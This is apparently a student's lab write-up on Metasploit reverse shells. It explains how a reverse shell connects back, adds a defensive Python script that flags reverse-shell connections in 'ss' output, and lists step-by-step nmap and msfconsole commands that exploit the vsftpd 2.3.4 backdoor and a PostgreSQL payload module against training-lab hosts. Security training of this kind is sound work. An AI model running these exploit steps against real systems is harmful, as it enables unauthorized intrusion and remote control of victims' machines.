Write-up on the Metasploit Reverse Shell

Metasploit Reverse Shell on localhost

Task

A reverse shell is to be created on Kali, so attacker and victim are both localhost.

Implementation

We use Metasploit for this. msfvenom is part of Metasploit and is a payload generator and encoder; its documentation is on the Offensive Security site.

It lists the available payloads with:

msfvenom -l payloads

In the exercise we use “linux/x86/meterpreter/reverse_tcp”, which creates a reverse shell that connects back to the attacker.

Questions

How does a reverse shell work? Who opens the TCP connection and to which IP / port?

The attacker/server listens on port 8080 on its own IP and the victim/client connects to it. In other words, the victim opens a shell and then opens the TCP connection to the attacker (who is listening on port 8080). With ssh it is the other way around: the server listens on port 22 and opens the shell when the client connects.

Who opens the shell? Who controls it? Which computer executes the commands entered?

The victim opens the shell and the attacker controls it. The shell runs on the victim, and the commands are executed there as well.
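As an added example (my own, not part of the original write-up), the two answers above can be turned into a check on the victim side: the host that called connect() holds an ephemeral local port, so an established connection from an ephemeral port owned by a shell process, or any process whose stdin/stdout/stderr is such a socket, is what the reverse shell in this exercise looks like in `ss -tnp` output, while the ssh case (sshd holding port 22) is the accepting side and is not flagged. The sample lines, port numbers and process names are constructed; the shell-name list and the 32768 ephemeral-port threshold are assumptions (the Linux default range).

```python
import re
from dataclasses import dataclass
from typing import List, Tuple

# Constructed sample in the shape of `ss -tnp` output on Linux; not a real capture.
# Line 1: a shell whose stdin (fd=0) is an outbound socket to port 8080 -> reverse shell.
# Line 2: sshd serving an inbound session on port 22 -> normal, accepting side.
# Line 3: a psql client talking to a database on 5432 -> normal outbound client.
# Line 4: an interpreter with stdout (fd=1) wired to an outbound socket -> suspicious.
# Line 5: the sshd listener itself (no peer yet).
SAMPLE_SS_OUTPUT = """\
State  Recv-Q Send-Q Local Address:Port  Peer Address:Port  Process
ESTAB  0      0      10.0.0.5:43122      10.0.0.9:8080      users:(("sh",pid=1337,fd=0))
ESTAB  0      0      10.0.0.5:22         10.0.0.7:51002     users:(("sshd",pid=812,fd=4))
ESTAB  0      0      10.0.0.5:41000      10.0.0.20:5432     users:(("psql",pid=900,fd=9))
ESTAB  0      0      10.0.0.5:45000      10.0.0.9:8080      users:(("python3",pid=2001,fd=1))
LISTEN 0      128    0.0.0.0:22          0.0.0.0:*          users:(("sshd",pid=700,fd=3))
"""

# Assumption: names of interactive shells worth flagging when they own a socket.
SHELL_NAMES = {"sh", "bash", "dash", "zsh", "ash"}
# Assumption: Linux default lower bound of net.ipv4.ip_local_port_range.
EPHEMERAL_PORT_MIN = 32768

LINE_RE = re.compile(
    r'^(?P<state>\S+)\s+\d+\s+\d+\s+'
    r'(?P<laddr>\S+):(?P<lport>\d+|\*)\s+'
    r'(?P<raddr>\S+):(?P<rport>\d+|\*)\s+'
    r'users:\(\("(?P<proc>[^"]+)",pid=(?P<pid>\d+),fd=(?P<fd>\d+)\)\)'
)


@dataclass
class Conn:
    state: str
    laddr: str
    lport: int
    raddr: str
    rport: int
    proc: str
    pid: int
    fd: int

    def initiated_locally(self) -> bool:
        # The side that called connect() is given an ephemeral local port;
        # the side that called accept() keeps its fixed service port (e.g. 22).
        return self.state == "ESTAB" and self.lport >= EPHEMERAL_PORT_MIN


def _port(text: str) -> int:
    return -1 if text == "*" else int(text)


def parse_ss(text: str) -> List[Conn]:
    """Parse `ss -tnp`-style lines; the header and unparseable lines are skipped."""
    conns = []
    for line in text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue
        conns.append(Conn(m["state"], m["laddr"], _port(m["lport"]),
                          m["raddr"], _port(m["rport"]),
                          m["proc"], int(m["pid"]), int(m["fd"])))
    return conns


def find_reverse_shell_candidates(conns: List[Conn]) -> List[Tuple[Conn, str]]:
    """Return (connection, reason) for outbound connections that look like a reverse shell."""
    hits = []
    for c in conns:
        if not c.initiated_locally():
            continue  # accepting side or listener: the ssh direction, not the reverse one
        if c.proc in SHELL_NAMES:
            hits.append((c, "shell process holds an outbound connection"))
        elif c.fd <= 2:
            hits.append((c, "socket is wired to stdin/stdout/stderr"))
    return hits


if __name__ == "__main__":
    for conn, reason in find_reverse_shell_candidates(parse_ss(SAMPLE_SS_OUTPUT)):
        print(f"pid {conn.pid} ({conn.proc}) {conn.laddr}:{conn.lport} -> "
              f"{conn.raddr}:{conn.rport}: {reason}")
```

On a live system the same check runs over the real output of `ss -tnp` (root is needed to see other users' processes); the psql line shows why the port alone is not enough and the process name and fd number are needed to tell a database client from a shell.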

Reverse Shell via vsftpd Exploit

Task

Metasploit is supposed to be used to exploit a vulnerability.

Implementation

First, I scan for open ports and find the associated services. Then I try to find a vulnerability for a service, which can then be used to create a shell.

The first part can be done with nmap.

nmap -v --script vuln iloveshells.vm.vuln.land

The result lists many MitM possibilities, but also the ftp-vsftpd-backdoor vulnerability.

We exploit these as follows:

msfconsole
search vsftpd
use exploit/unix/ftp/vsftpd_234_backdoor
options
set RHOSTS iloveshells.vm.vuln.land
run

Afterwards we are already on the victim.

Reverse Shell via Postgresql Exploit

Task

We are supposed to get access to a system that was not meant to be online.

Implementation

nmap -sV 1b215cfe-44e6-4d1d-952c-3aa55d2b63e1.rdocker.vuln.land
msfconsole
use exploit/linux/postgres/postgres_payload
set RHOSTS 1b215cfe-44e6-4d1d-952c-3aa55d2b63e1.rdocker.vuln.land
set RPORT 8181
run

You now have a shell and can do what you need to do.

Good to know

  • Nessus does not find everything.
  • Tools rely on conventions such as PostgreSQL on port 5432.
  • If something is not on its default port, you have to collect the information yourself -> nmap port scan and service detection.
  • The script scan nmap -v --script vuln did not detect port 8181 as PostgreSQL. vuln is only a script category; it is better to use the matching script and to define the port explicitly with -p.